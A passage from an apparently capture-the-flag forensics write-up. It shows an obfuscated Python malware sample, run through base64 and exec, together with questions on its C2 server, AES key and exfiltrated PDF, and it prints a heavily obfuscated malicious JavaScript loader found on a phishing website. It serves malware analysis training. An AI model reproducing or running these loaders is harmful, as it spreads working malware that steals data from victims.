YTFvXHgxNFx4ZWJcJ1x4ZWJceDlmP1x4ZjFceGQ1XHg4N1BceDBjXHhiNmcqXHgxYnFYXHg5M1A9QFx4MWNceDBiXHhhYlx4ZWNcdFx4MWRxXHhhOVx4OTRceDE2XHgxMHVceDBlelx4YzdceDllRypceDEyXHgwNktceGY1XHhiOFx4MWNhXHhlNyBceDFhXHhmMFx4YjVceGE4XHg4NzlceDg2XHgxOFx4ZTJceGIwXHg5Nlx4YzFdfmBhY1tceGMyXHhkZVx4ODNceGE1RzJAWzJceDk2XHhjNWZceDdmXHgxN1x4YTdcblx4MWJceDljVVx4MDZceDA3O2BceDk2XHhhMzFcdFx4ZThceDk0dFx4YzBceGJkeldceGFlV1x4YjNeXHhmNFx4OWVceGY2XHg4MzRceDBjXHhiMiJceDhlXHg5NFx4ZGFceGFmcFx4YTQlTlx4OTNceDA0NUNceGExYEFceDAyXHhjMS1oXHg4MFx4OGRceGI2XHhjOWRceGM1XHhkZVx4OTgtXHhhMlx4YmZceGFmQlx4OGNceGQyXHg5YVx4YmVceDk4LFx4YzRceGZkXHg5MyhWXHhkMWpceGQzXHgxY0FceGI1XHhhZVx4N2ZceGFlXHg4ZVx4OWNceGIwKVx4OGI1XHg5Nlx4MGNceGZmUlx4OWVcclx0XHhhZTI0XHhmNlx4ZjZceGZiXHg4NT1ceGM3XHg4ZGRceGM4TzFceGNiXHhjZVx4YjIqXHg5OFx4MWRceGI1TFdceGFmdFx4Y2JceGNiXHhiZSlceGZjXHhjMExceGFjSlx4MDNceDk1XHgxYlx4ODVceDk0XHhkMF5ceGUydXYvXHgwMFx4MTBcclwnXHgxZVx4YzdceGI1XHhmZFx4ZTdceGU2XHhhZlx4MDNceGE2XCdceDg4VVx4YWJceGQ5XHhhODVceDhhXHhjYVx4ZDRceDg0b1x4YjBceDgzXHhjNFx4YjlceDFhXHhmNFx4OGNceGMwXHhiOVRceGFlXHg4Nlx4YTJjUFtceDgwRFx4MWFceDkxelx4Y2FceGIwXHg4M2A0XHg4NFx4OGFNXCc7clx4OTFkJVx4OTlceDg5XHhhN1x4MTBYcFx4YzhceDk2XFxceDgyW1x4ZThceDliXHgwMVx4YzBceGRkXHgwN1xyXHgxMFx4YzdceDg1XHg4M1JceDA0VGNceDFlXHg5OTwpXHhjOVx4OThgXHgxNlx4OWNceDgyYmxceGFjXHhhOUlceGVkaCtQXHhjY1x4YTdsXHhiMTdceDk3U1x4MWJceDgzV1x4YmVceGE1fFx4MDgzWkpceDgwXHhlY1x4Y2ZtXHhjOFx4ZDlceDhiXHgxYSFceGJmXHgwY1x4MTRceDEyPHtmXHhhMlx4YTBceDA1dVx4YjJceGY5XHhmMlx4OWFceGRlXHg5NXJceGEwXHhmNT4iXCdceGU5XHhlOFx4YWVceDEyXHgxYVx4MTJceDkyUVx4MTFceDkxXHhhOCJceGUyXHhiZjBceGIyXHhlNVpceDg4RFx4ZTZceDAxXHg4OCNceGQzXHhhYVx4YWJWfVx4YmRceGQ2S2hceDFhT0dceDk2Klx4YTBceGQ3XHhhZFx4ZDhcXGhceGMzVVx4ODBceDdmXHhhMFx4YjNceDA0XHg4Nlx4MGZceGE0XHhiMlx4YjVceGZiKlZWXHhhNVx4YWJceGM1IFx4YmEoVSpceDFlOFx4YTdceGExUlx4MTdceGI1SFx4Y2JoXHhmOFx4MWR9XHhmNUlceGE3VVlceGNhOCNceGY2ayEmfD5ceDEzKDxceGIzXHhjZjsjXHg4Ylx4MTFceDhlXHg5Zlx4MDdJXHgwMyBceDEzXHhmOFx4ZGU6XHhjZVdceGMwLFZceGMwWEBceGQwXHgwMlx4MDRiVCtceGMzXHhkMFx4MTR1dVx4ZWJceGJiRVx4YTRYXHhlZlx4ZWRceDFjKFx4OWFceGNjXHhmOW4rXHhmMFx4ZTBmXHg5ZnYvdjZceGVkXHhkMlx4YzYvXHhjYV5ceGQwXHg4YnRceGU5Jlx4ZGNcdFx4OTNceDgwXHg4YVx4YTRGXHhhNnhuYFx4YjdceDlkXHg4Nlx4YzdjXHhhMFkxXHhlNlx4ODlceDkyXHgwOGhceDhiXHhmOCk4P1x4MTNcblx4ZTY8XHhkOFx4ZWE1XHhlY1x4ODBceDAxYlx4YzZcXFx4YmVceDkwXHgwN1x4YzguYVx4Y2FceGNhXHg5MVx4ZDhoUVx4YjFceGM0XHhmOVx4ZjJceDFhXHg5NVx4OGNceGUxaDBccitceGIwOlx4ZDRceDAyJCFQQ1x4ODNQXHhlNExceDk5XHhiOVx4MTZxXHhkNFx4YTFceDk4XHJKMFx4OTdceGQ3XHhkYjN8XHg4MFx4ODFceGU4XHhlMS5ceDAwQFx4YThceGNhXHhjN1x4ZDVceGZjS1x4YzlceGFhXHhjNlx4ZWNceGM3XHg5N1x4YmNceDk5XHhiNm1ceGYxXHg4N1x4OWFNXHhiZE9ceGQzP1x4YmNceDk3XHg5M1x4YWZsclx4OWM9XHg4Zlx4Y2VceGZlXHhkNCpceDAzXHg5Mj8qVFx4MTg8XHg4NVx4YzIrXHgwNFx4YzNAXHgwNFx4ZjVceGYzXHhjMGppI1x4ZTRwXHgxOFx4YjVceGNkXHgxZmBiXHg4M1x4OTlceGEzXHhmY1x4MDA/XHg4ZktceGJjXHhhNmdceGQ5XHgwMFx4ZDJ2XHhkZlx4OTcrXHhkM1x4OTYxXHhhOHptXHhlNVx4OWJQXHgwNFx4ZjJMJj8gXHhjMGBceGI0XHgwMFx4Y2FceGYwYVx4YmU5Q1x4ODBiXHg4N0VceDgzXHhjZWhceGY5M3R9W1x4MWZceDlhJlx4ZmFceDBjXHgxYWBceGU1XHhjYz9lXHhkYlx4MDZceGUzPFx4ZjdJR0hceDljXSVocFx4ZWM/JFx4MTlceGI5T1x4ZDEpXHhiOVx4YjJceDBjXHhiN1x4MDNaR1hceGUzXHg5Mlx4MDhceGQyXHhjOVZCcCxceGI3XHhlY1x4OTQzXHg4YVx4ZDJceDFmNUFASFFceDlkIFx4ODBceGEzcDhceGYxXHhhMk1ceDA3fFx4OTVuXHhlM1x4OTJrXHhmOVx4YjVceGQwIFx4YTdceGMwXHg4NS9ceGZjQ11ceDA0PFx4ZDVcbjVceDg3XHgxMVx4MTdceGU0b0BceDliKlx4YzBcblx4YzNOa09oXHhmOG4gXG5qP1x4OWY9XHhmNX1ceDA2XHgxNWhceDk3N0FdXHgwYlx4YjhceDk0XHhiZVx4YjBceGQ3XHhiZVx4YmFceDhlXHhiN1x4YWZuXHhhNlx4OWYjXHgwOD81XHhkZVx4ZGRtP1x4ZWNceGM2XHhhYTNceGQ2alZceDBiLlx4ZWFtXHhhYlx4OTRgXHg5NU9ceDEzXHgxODhceGM2XHhjOEkkOVx4ODNceDdmaWxceGYyXHhmOVx4MTdceDE5aFx4OTMqXHhiZmtceGIyXHhlYSNceGFkXHhiZlx4Y2JceGU1e0NceDE1XHhjZWZeXHhjYVx4ODhceDk5V3lhXHhhY1x4OGNceGRiXHgxMVx4MTZceGQ5XHgwN1x4MDV5XHhlNUNceGI0LFx4YzJceGMzXHhjZFBceGQyXHhlY1x4ZTRceGNlVCRceGFhKlx4YTEmW1tceDhkXHhiN1x4YzVceDliXHhjM0NceGJhKV9GXHhiYVx4YmRceGFjPE43KWdceDlmXHhjMVx4ZDhwXHhhYlwnXHhkOSNLXHg5NjZ6XHhmY1x4OWRceGViXHhkN3dceGI3XHhkMFx4ODlceGE0XHhiOSBceDg4XHg4OFx4ODQ2XHhiNVx4YTFceDg0Slx4Y2VceGEyXHgwYlx4ZTg3N1x4ZjdceGYzXHgxN1x4MGNceGQzXHhkMClceGUzXHgwN1x4ZGN2bVx4YTAjXHg5Nlx4ZmZ4XHhhYVx4ZTZFX1x4MDdhT1x4ZWZqXHhiYVx4ZTNjXHg5Ylx4ZGVsJFx4ODNoXHg5ZVx0TFx4MWZceGEwfSUicFx4OWNceGQ0XHhkMVx4OWVceDhlXHhmZGZdXHRceGFjI1x4YmZceDE1XHg5YzxceGYzLVx4YzJaalx4OTlceGFlXHhjOC5ceGIzXHg5ZDVceGZhXHhlMlx4YWVceGVhXHhiYVx4ZjRceGM2M1x4MDRPdFx4ZjlceDEyXHhkMXtuTUpCXHgxYixceGJjXHhiZWtceGEwXHhjYVx4YTZceGE1XHg5My9ceDBmXHhhMSlZXHhiNHYyTDNceGE1XHg4ZFx4MGNxKFx4MGZceDE4XHgxMFx4ODJQLSJceGU1XHhlMVx4ZThceGIzXHhhM1N4Slx4Y2NceDBjXHhkY1x4YWUtblx4Zjd9d1x4MTlceGFlLlx4Y2JpXFxiXHhkZjBbXHgxMFx4ZTlceDFhMnhWWktceGQwU1x4ODhceGQyYyYrXHhmN1x4ODNPalx4OWRceGFiXHhiN1VoInpceDk3XHhmMFx4OWRceGE3XHg5Mlx4ZDZbKHdceDBlKVx4YzhceGZmTXxceGEzalx4YTE1XHhjN1x4MDRceGU0Wlx4ZDhceGEyXHg4OFx4MDhcclx4ZWFceDkwSlx4YmFNXHgwMVx4YjBceGQydVFceGMwXHhhMVx4Y2RcXFx4YWRWXHhlMlx4ZjMuXHgwYmxceGU4XHhhOV4kXHhjOVx4OTVceGY2VFx4MTNXXHgxOFx4ODI0XHgwMTZceGM4JSxceDA4XHhiZVxuXHhhMlx4ZDVBQlx4ZGQ1Wz1tNzpceDA2XHhhMFx4ODBceDg2XHgwNFx4YjVceGU1RVx4ODNLPnF5WVx4OTRTXHhiOFx4ZDgwXHhkNltceGMyXHg4NGtceDBiXHhkYlx4ZWNceDE1XHhiNlx4Y2YtXCdceGYwZUBmXHhhOVE2VVx4Y2JpXHgxM05ceGJhc10zUVx4YjFceDhkaUZQXHhiYiFQXHhmZlx4ZDJceDgyblx4OThceDlkSF5ceGQ2a1x4ZDNceDhlJVx4ZTBrXHhjYVx4OWJceGQ0XHhmZlx4OTBceGJhLVFceDE1XHhhNVx4ZDNceDE0T1x4ZTBceDEyXHgwNl0iXHhiMlx4YThceDgyXHhhY2BcJ0xceDk4XHhiZFx4YmNiO1x4YWRceDEzVFx4OTVceDE1b1x4MWEhXHg4OVx4YzNceGFkTnx6XHg5YnZceGY5XHg5OFx4MTRceGNhXHhmZlx4ZTJceGVlSFx4YTdcblx4MTJceDExXHhhNU5ceGUwXHgwMCcpKSk="
decoded_script = base64.b64decode(encoded_script).decode("utf-8")
exec(decoded_script)
1
2
└─$ python3 decode.py
<code object <module> at 0x2bd99dc0, file "Py-Fuscate", line 1>
Question 4: What is the IP address and port used by the malware to establish a connection with the Command and Control (C2) server?
Similarly, we can modify exec()
to dis.dis()
and execute the Python script directly. Once executed, the Python bytecode is disassembled for further analysis.
Analyzing the code, we can see that the script has a function to connect to the C2 server.
Question 5: What encryption key did the attacker use to secure the data?
Further down the code, we can see that it encrypts each remote command with AES-CBC.
Here, you can see the AES key is between the user
tag and <SEPARATOR>
tag. Since we already have the PCAP, the AES key can be identfied right after the malicious Python script is executed.
Question 6: What is the MD5 hash of the file exfiltrated by the attacker?
Decrypting the first few messages, we can see that a PDF file was targetted by the attacker. Extracting it with CyberChef, the MD5 hash can be obtained.
1
2
└─$ md5sum flag.pdf
aa763fe4d68ea61068db3f5747e9309d flag.pdf
Tales for the Brave [Forensics]
Question: In Eldoria, a once-innocent website called “Tales for the Brave” has become the focus of unsettling rumors. Some claim it may secretly trap unsuspecting visitors, leading them into a complex phishing scheme. Investigators report signs of encrypted communications and stealthy data collection beneath its friendly exterior. You must uncover the truth, and protect Eldoria from a growing threat. When debugging JavaScript, ensure you use a Firefox-based browser.
Flag: HTB{APT_c0nsp1r4c13s_b3h1nd_b3n1gn_l00k1ng_s1t3s}
We are given a website to investigate. However, since this isn’t a web challenge, I assume we don’t have to perform any web exploits on the webpage to get the flag.
Checking the source code, it seems that a suspicious JavaScript was placed within the same webpage and it was obfuscated heavily.
1
var _$_9b39=(function(n,w){var r=n.length;var j=[];for(var e=0;e< r;e++){j[e]= n.charAt(e)};for(var e=0;e< r;e++){var d=w* (e+ 439)+ (w% 33616);var a=w* (e+ 506)+ (w% 38477);var v=d%r;var p=a%r;var x=j[v];j[v]= j[p];j[p]= x;w= (d+ a)% 3525268};var c=String.fromCharCode(127);var q='';var m='%';var t='#1';var o='%';var u='#0';var k='#';return j.join(q).split(m).join(c).split(t).join(o).split(u).join(k).split(c)})("Ats8ep%%e6Sr%prB%feUseEynatcc4%ad",1198358);;;;;;;;;;;;;eval(CryptoJS[_$_9b39[1]][_$_9b39[0]]({ciphertext:CryptoJS[_$_9b39[4]][_$_9b39[3]][_$_9b39[2]](btoa(unescape("\u0062\u00FB\u0033\u00C0\u00DC\u005C\u0051\u001F\u0062\u00F0\u0023\u0053\u0013\u007F\u0014\u003D\u0022\u00D4\u0049\u009A\u00F5\u005B\u0040\u00D3\u004B\u008F\u009D\u00AC\u00C8\u0035\u0009\u0009\u0066\u005A\u0086\u0083\u007E\u003D\u00CA\u00E6\u00CD\u0043\u0001\u00ED\u00B9\u0020\u0003\u0056\u00D3\u0015\u0023\u0001\u00AC\u0001\u00F9\u009E\u0024\u001A\u00BE\u00DF\u007F\u004A\u00D7\u0030\u0064\u00C2\u008F\u00BE\u00C9\u0000\u0043\u0027\u0070\u00DD\u0050\u006B\u00A7\u0099\u00AA\u00BC\u00BA\u0010\u00C3\u0031\u005E\u00C3\u00A7\u0024\u00C3\u0065\u0069\u00DB\u00A1\u00A8\u0079\u0093\u00E0\u0056\u00BD\u00C4\u0095\u00A1\u0092\u000A\u0046\u007B\u00CB\u0076\u00B6\u004B\u00EC\u00AF\u0070\u0098\u008F\u008F\u004B\u0033\u0040\u00F0\u0074\u0061\u00F9\u0076\u0009\u00BF\u0015\u005A\u007A\u00BE\u00B6\u009D\u0049\u005B\u0028\u0028\u000B\u00DD\u0043\u0092\u009F\u00D6\u0043\u00A1\u0083\u002B\u00B8\u00E6\u006B\u003B\u002C\u000A\u00D9\u0019\u0078\u005E\u00E8\u0092\u00E7\u00FD\u0028\u0079\u0046\u004D\u00EE\u0074\u00B7\u00FD\u0094\u00A9\u0084\u00E6\u0085\u00A0\u00A8\u00E1\u00A7\u0044\u009A\u004C\u0021\u0050\u0056\u008B\u00CC\u00AA\u00EF\u0076\u0065\u00CD\u0021\u0001\u0075\u0041\u006F\u009D\u00CB\u006E\u00A5\u0055\u00F4\u0033\u0043\u000A\u0083\u005C\u00F4\u00D9\u0025\u008A\u0098\u003A\u00C6\u0088\u00E1\u0076\u0035\u00EF\u00F9\u00D4\u00BD\u004E\u0048\u0028\u0056\u0069\u0040\u003C\u00B1\u0086\u009E\u00E1\u00D9\u00BE\u0084\u005E\u0022\u0054\u0026\u00FE\u0006\u0022\u0000\u00D8\u0083\u0089\u00F4\u0075\u0078\u0052\u009C\u00DA\u0098\u0037\u00BA\u0004\u0016\u0046\u00A6\u00AD\u0088\u001B\u00D4\u0016\u000B\u00B6\u00BF\u002F\u0061\u00C9\u009A\u0056\u0048\u001C\u0085\u0080\u006D\u0031\u0066\u00F9\u00FA\u002F\u00F1\u0036\u0079\u0020\u00E7\u00B2\u002F\u00B6\u00B9\u001E\u00A7\u00AC\u0097\u00C5\u0015\u008B\u00CA\u005A\u008A\u009A\u0033\u001D\u003E\u0086\u006F\u0015\u0043\u0076\u0067\u000A\u00D0\u0007\u009B\u00A1\u00BB\u002F\u0026\u00CA\u0030\u00EB\u0023\u0093\u00C7\u001D\u00AC\u0057\u0073\u002F\u0028\u004A\u00A5\u00EC\u00D1\u005B\u0045\u0077\u0030\u0047\u0008\u0097\u00C4\u003B\u001C\u00CB\u00E9\u0033\u00E9\u0013\u007B\u00F6\u00D1\u00A4\u000A\u00AA\u0090\u008E\u0041\u005E\u000F\u00FA\u00AB\u00F4\u0068\u0087\u00C8\u009C\u00A6\u0037\u0083\u00EC\u0021\u0056\u00D8\u00B1\u0095\u0010\u00CC\u008D\u0023\u000F\u0074\u002F\u007B\u0085\u0037\u006C\u00D8\u00C8\u000C\u006A\u003A\u00B3\u0071\u0029\u00AC\u00B9\u004D\u0011\u00EF\u0097\u00F8\u00E2\u0044\u00E5\u00BF\u00FC\u0053\u00CF\u0026\u00CE\u00F2\u0046\u0059\u0017\u004D\u008B\u00F1\u002C\u0089\u00E1\u0056\u0040\u0058\u00A8\u00AC\u009B\u00F2\u0063\u0086\u0085\u0073\u009F\u00B4\u00B5\u00B3\u0041\u0037\u00F8\u0034\u009C\u00F4\u0088\u0059\u00D0\u008E\u004A\u00B5\u00C6\u0066\u0044\u0042\u0026\u00F2\u0008\u0090\u00F8\u0075\u00A5\u006C\u0041\u008D\u00B8\u0061\u00D4\u00E8\u0089\u00DD\u0087\u0087\u0014\u00C9\u0093\u0013\u00FC\u007D\u007E\u00E5\u0048\u0043\u002E\u002E\u004D\u00E6\u0078\u00FA\u00A1\u00F7\u008F\u0095\u00EC\u00B3\u006F\u003A\u00CF\u00A7\u00BF\u00F3\u0051\u0094\u008B\u007C\u00A0\u0030\u009B\u0019\u00C0\u00FE\u003B\u0052\u0041\u00CB\u00AF\u0008\u00E2\u00A8\u00A3\u0027\u0075\u00DE\u00A8\u00FF\u005C\u0054\u008B\u0069\u0019\u00F5\u007B\u00A0\u00CF\u0065\u0079\u00B6\u00FC\u0099\u0037\u0043\u007C\u00CD\u007F\u0068\u00E6\u00D3\u00E7\u0084\u0093\u0010\u0088\u000F\u00B8\u0040\u001D\u001B\u0038\u00CA\u0010\u0043\u0003\u0094\u00BD\u0076\u00AF\u000C\u000D\u00DA\u009D\u0049\u000B\u005F\u003E\u00A2\u00F3\u00D5\u0045\u00F8\u00DD\u001E\u0057\u0003\u0053\u0044\u006B\u009E\u003B\u00A7\u00DF\u004A\u001A\u0040\u0094\u0080\u00EC\u00E8\u009B\u0010\u00E6\u0040\u0079\u0057\u0020\u009F\u00FF\u001F\u0042\u006D\u0057\u0055\u00A1\u003F\u0091\u006E\u00D7\u00F7\u00A2\u0089\u00F2\u007A\u000D\u0088\u005E\u00CE\u002D\u00C5\u00C3\u0001\u0071\u002A\u007A\u003D\u009C\u00F5\u00C3\u0080\u00CA\u002D\u0069\u004B\u005B\u0061\u00CD\u0055\u000F\u009C\u00C6\u00E6\u00FB\u0038\u00A1\u00FB\u00D1\u00BA\u0062\u00BE\u0031\u0072\u00EF\u00C0\u00D6\u0056\u00FF\u00DA\u00FE\u00CA\u0081\u0001\u0072\u00BC\u0025\u0079\u00B8\u007F\u0055\u00C5\u0071\u008C\u000C\u00D4\u0059\u0030\u0022\u00CC\u00C8\u005D\u005B\u0077\u0009\u00A2\u0038\u0054\u0013\u003F\u00BC\u00CD\u001F\u0039\u00DE\u001A\u0046\u0057\u0016\u0045\u001F\u00FF\u001E\u002F\u002C\u0032\u00EA\u0029\u0035\u00A1\u008B\u001B\u00F7\u0048\u00D6\u000A\u004C\u009F\u0044\u0093\u00D2\u002B\u0023\u00F9\u0022\u0044\u001C\u0012\u00D6\u0061\u0097\u00AF\u004B\u001E\u00DC\u000E\u0033\u00F3\u00A1\u00FA\u0050\u00CE\u0000\u0024\u0086\u00C9\u0045\u0061\u00A7\u00BC\u0074\u0096\u0058\u0087\u00B6\u00D4\u006A\u0087\u00BB\u0027\u00D8\u00B6\u0045\u007D\u0030\u0097\u0089\u005D\u0034\u0023\u0042\u005B\u003D\u00A0\u0012\u00F3\u0032\u00EA\u0040\u006B\u0023\u00EA\u00A9\u003D\u006C\u0013\u009B\u007A\u0096\u00CA\u0023\u00CC\u009C\u001A\u0083\u0058\u0004\u0098\u005F\u008B\u0048\u0001\u0091\u00CF\u008F\u00D0\u004F\u0092\u0015\u0076\u00C0\u0078\u0072\u000D\u0071\u0001\u0022\u0063\u00B6\u007D\u00E9\u00D3\u004B\u00A7\u008F\u00ED\u00F7\u0016\u00AB\u002D\u00B9\u0001\u00F2\u008B\u00E9\u002F\u0062\u00EE\u003C\u008D\u0040\u0016\u00C0\u00A7\u0017\u0065\u00B9\u002F\u009E\u00DC\u00E4\u00BC\u00FD\u00E7\u0023\u002C\u0066\u000A\u0024\u008C\u00F2\u00E4\u00AE\u00A3\u00C1\u0068\u007D\u001E\u0058\u000F\u0081\u00D5\u0047\u0010\u005B\u000A\u002A\u00B6\u0041\u003A\u00A8\u001D\u00DD\u0091\u0008\u007C\u005D\u00E1\u0013\u0002\u0004\u00B8\u0087\u00FA\u0019\u0009\u00B8\u00C1\u0044\u005D\u006E\u007D\u000E\u0092\u001E\u0034\u008D\u0076\u00B7\u00D4\u009E\u0059\u004C\u00CD\u0011\u002D\u0047\u00A0\u00EA\u002A\u0098\u0039\u00A5\u00DF\u008F\u0041\u00FF\u0000\u00C6\u003B\u00E0\u0025\u00F4\u0005\u00C0\u00FB\u005B\u0013\u0090\u0038\u00FA\u0031\u0037\u00BA\u0011\u006E\u00DB\u009A\u00BD\u0074\u004F\u0047\u0039\u00B8\u0047\u001E\u00F6\u00BF\u0008\u00E7\u0029\u004A\u0031\u00C8\u009F\u0099\u0045\u009A\u00B4\u00FF\u0009\u0052\u00BC\u00FE\u00C3\u006A\u0092\u007D\u000E\u00E4\u00A8\u000B\u007E\u0054\u000E\u0088\u00B2\u0058\u00F5\u00DD\u0044\u0054\u00F9\u0067\u0072\u00B0\u00DD\u00F6\u0047\u00C3\u00D5\u00A3\u00AE\u003C\u0051\u003E\u00DE\u0019\u00BC\u0041\u0065\u0024\u0067\u0045\u0075\u002E\u0008\u0086\u00AF\u0037\u00CD\u008B\u0000\u0062\u0063\u0069\u00C4\u003B\u0065\u00F7\u008A\u00C9\u0043\u00FC\u005E\u0080\u0058\u0046\u002A\u0059\u0074\u00D0\u0041\u00D3\u0069\u0027\u0045\u0053\u0001\u00A7\u00F4\u0065\u003C\u00D5\u00CE\u008E\u0066\u0077\u00A1\u00D8\u003B\u00EA\u0054\u003F\u003B\u00EE\u00E8\u00BD\u00B6\u0040\u00FE\u0009\u0071\u00DA\u001B\u007F\u00D4\u0019\u003E\u0065\u0062\u00F1\u00CA\u00EB\u0073\u0004\u0061\u00A4\u00B6\u006B\u0002\u0082\u00AA\u00DA\u00DA\u00FA\u007B\u0093\u005E\u0053\u0080\u0049\u0017\u008E\u00ED\u00EF\u0058\u0016\u005D\u0041\u006C\u0015\u0088\u0088\u0085\u00A6\u004D\u0003\u00A8\u0014\u001C\u000B\u0085\u0049\u0042\u006A\u00DA\u006C\u00CD\u00DD\u00C3\u0049\u00F7\u00E4\u0049\u0049\u0027\u0018\u00E4\u00A8\u0045\u0069\u00F5\u000A\u0009\u0045\u00CD\u00BC\u0075\u0047\u009A\u0056\u00BE\u002A\u0026\u00C0\u00E8\u007C\u004E\u000D\u003B\u00E8\u0017\u00BA\u0098\u008D\u0008\u0062\u0047\u00EC\u00D4\u0005\u00AD\u003D\u0094\u008B\u00A0\u0023\u0054\u0016\u00A9\u0022\u00E9\u00DD\u007A\u0046\u00D1\u0022\u0074\u0020\u0006\u004B\u006F\u0099\u003F\u004E\u00B1\u001C\u00D6\u0081\u00D9\u001C\u003D\u0099\u0086\u00EA\u00EF\u0084\u0088\u0044\u0060\u004D\u0048\u0039\u0099\u0015\u00D8\u00D4\u0029\u009F\u00E2\u0056\u00E4\u001A\u0008\u0049\u00A3\u009C\u0056\u00AE\u00AC\u0052\u0089\u0002\u00D8\u00FB\u007E\u0078\u006D\u00AF\u00E9\u0065\u0020\u00A4\u00C0\u0013\u007D\u00C0\u0085\u0072\u00CF\u00FB\u00DD\u00F9\u00C3\u00A7\u0097\u000E\u0048\u003D\u00ED\u00A8\u0055\u00FA\u0070\u00F3\u001F\u0034\u0012\u00E1\u00C4\u000D\u00A1\u0055\u000F\u008D\u0000\u0039\u00BE\u0070\u0078\u0005\u0051\u0030\u00BA\u0023\u00C2\u00F8\u006F\u0045\u0098\u00B5\u00BE\u00A5\u0031\u0007\u0078\u0097\u0078\u00B8\u002E\u00C0\u0069\u0037\u0099\u0019\u00E3\u007D\u0025\u0003\u002B\u00EF\u0008\u00AD\u0055\u0094\u00E2\u009F\u0008\u0016\u0078\u0029\u00A7\u0067\u0059\u006A\u000F\u0080\u008D\u00A4\u001F\u0003\u00BD\u00AE\u0071\u0057\u0043\u0049\u00D4\u0034\u0012\u00AD\u0069\u00E3\u0085\u001F\u002B\u0063\u00BB\u00A7\u00DF\u005C\u00C6\u000C\u0076\u000B\u0006\u003F\u00D9\u0086\u00B5\u00D4\u0095\u00D8\u0064\u00E4\u00FA\u00F8\u0038\u0023\u008D\u00E6\u00A8\u0022\u00B6\u0047\u00DD\u005E\u00D6\u00CE\u001D\u0084\u003E\u0088\u00A5\u00C7\u0071\u004E\u0009\u00CA\u0023\u00A6\u0078\u00FD\u00C2\u0053\u003F\u00FE\u00A1\u002B\u0051\u0000\u00E6\u00FF\u00C5\u0045\u0073\u00BA\u0061\u004A\u00AE\u00C8\u00CF\u0006\u0036\u0044\u00FE\u0072\u00BF\u00B1\u005C\u0051\u00EB\u0003\u00C9\u00F3\u0020\u00B8\u0071\u00FA\u0046\u009D\u001A\u00D4\u000F\u0072\u0082\u0094\u0045\u0016\u000E\u00AA\u00F6\u00E2\u000E\u00A1\u001B\u008C\u000A\u0082\u0049\u003E\u0093\u00CB\u0087\u00CB\u00E9\u009C\u00B0\u0030\u0036\u007A\u00A6\u002A\u0016\u0020\u00DB\u00B1\u009E\u008E\u0003\u00A8\u008E\u005B\u005B\u0099\u001C\u00EA\u002E\u00AB\u000D\u005D\u00A3\u00A0\u00E8\u00CA\u00D7\u000B\u0081\u003D\u002F\u0039\u0083\u006F\u006B\u000D\u003A\u0025\u00CC\u00EE\u00DE\u006C\u0037\u007D\u0044\u0062\u0062\u0033\u0047\u0082\u00D9\u000D\u00A3\u0095\u00E1\u00F5\u0043\u00F3\u00A4\u00F3\u006E\u0071\u0019\u0021\u00D6\u009E\u000C\u0080\u0007\u00E7\u0076\u0034\u00AC\u0019\u0021\u0019\u002B\u00D3\u00C2\u00F2\u0072\u002B\u00C6\u00A8\u0043\u00F6\u00D9\u00B9\u004F\u0067\u0097\u0093\u007B\u0040\u001E\u0004\u0020\u00FC\u003F\u00D3\u00AD\u0079\u006E\u00E9\u008C\u00C7\u00EA\u00A7\u0009\u0054\u009D\u0030\u0088\u0044\u0016\u0017\u0061\u00DC\u00F6\u0057\u00C5\u0080\u001B\u0000\u0026\u0033\u0034\u0079\u009C\u0021\u00BC\u00A7\u0032\u0083\u00D7\u0082\u00CA\u0029\u0031\u0000\u0085\u0031\u0045\u0009\u0002\u00D9\u00F8\u0025\u00D8\u00E4\u0019\u0003\u00FA\u00B8\u00A5\u009B\u0093\u001F\u00FC\u00E6\u002F\u00F0\u0018\u00A3\u0021\u00E4\u0071\u001D\u0018\u0014\u00E9\u0027\u007A\u0070\u0072\u00D7\u002D\u00E2\u00A7\u0048\u00F7\u009F\u0072\u00E2\u00C7\u0094\u00A9\u00D4\u00E7\u0004\u0092\u00F1\u0076\u001D\u0031\u00E7\u009D\u00D3\u0087\u00EF\u00D4\u00D8\u00C5\u001F\u00FF\u008B\u00E9\u0041\u00EA\u00E9\u002D\u005A\u006C\u00A8\u008E\u0076\u0072\u0072\u0015\u003C\u00E6\u0004\u0005\u00A1\u00C7\u0001\u00EF\u00BB\u0055\u006E\u0030\u0017\u00E4\u0076\u00F9\u00FA\u002C\u0064\u008D\u00AE\u000D\u0097\u00D8\u0040\u005A\u00C4\u0039\u00E4\u006A\u0011\u0012\u00B5\u0061\u00FE\u0016\u001F\u00BA\u0070\u005A\u003A\u008F\u0033\u0091\u00F6\u0016\u00E2\u00E1\u0076\u0088\u00B3\u0007\u0068\u0032\u00CC\u0040\u00FB\u00E5\u0029\u008C\u0052\u00FC\u00CB\u000A\u00DF\u00EC\u00FB\u00AA\u0034\u003C\u00A1\u00D4\u00A1\u004B\u00C7\u0072\u006F\u00CF\u0003\u0004\u00D7\u002E\u00C9\u00B5\u0096\u008F\u00C6\u0039\u0045\u00A2\u008F\u0087\u0011\u0078\u0052\u00E8\u0080\u0086\u0091\u0082\u00AC\u00E5\u004F\u000B\u0040\u00EE\u0081\u00F4\u0025\u0001\u008E\u0019\u00B8\u00D2\u0052\u0028\u00ED\u00E5\u0029\u00DD\u0076\u000A\u0002\u00B9\u003F\u00D8\u000E\u00EB\u003C\u00DA\u00A1\u005A\u006E\u009E\u001B\u006A\u0034\u002A\u0071\u0083\u005C\u0011\u00E2\u00B9\u00A8\u0047\u0046\u00A9\u005E\u0056\u0088\u0053\u003E\u00ED\u0028\u0019\u001A\u00E6\u0050\u00AA\u0095\u0017\u000F\u00C3\u002D\u00C1\u0088\u004E\u0025\u007D\u0004\u0017\u0098\u005B\u0030\u00A1\u001E\u003C\u00FC\u007B\u00D1\u000B\u00C9\u00B3\u00A0\u002E\u0065\u0080\u0034\u0084\u0022\u00D4\u0079\u0053\u007D\u00D0\u0002\u005B\u00A2\u0060\u009B\u00BD\u000A\u006D\u009B\u007D\u00D5\u00A6\u0067\u00C8\u006E\u007C\u006B\u0090\u00C8\u000D\u00E4\u0026\u002E\u00BF\u0044\u0009\u00D3\u000F\u0047\u0001\u003C\u006A\u0012\u008C\u0028\u00DC\u00F2\u0041\u00AF\u0032\u0012\u0087\u0007\u008E\u00AC\u0011\u00F7\u007D\u0007\u0027\u004C\u0097\u0010\u00B3\u00D1\u00B7\u00B7\u0055\u000E\u001F\u00EC\u0025\u0082\u00AA\u00D0\u00BE\u0068\u0022\u00C0\u00E3\u0073\u00A1\u0006\u00BE\u00DB\u00C3\u0015\u0048\u0093\u0036\u0043\u0046\u009C\u0024\u003F\u00FA\u005B\u003B\u0015\u00EA\u00EF\u00C1\u0060\u00A1\u0096\u00DD\u0019\u0099\u00F1\u000E\u0075\u00DC\u0010\u004F\u0084\u00EA\u00F9\u0064\u000A\u0093\u008F\u004E\u00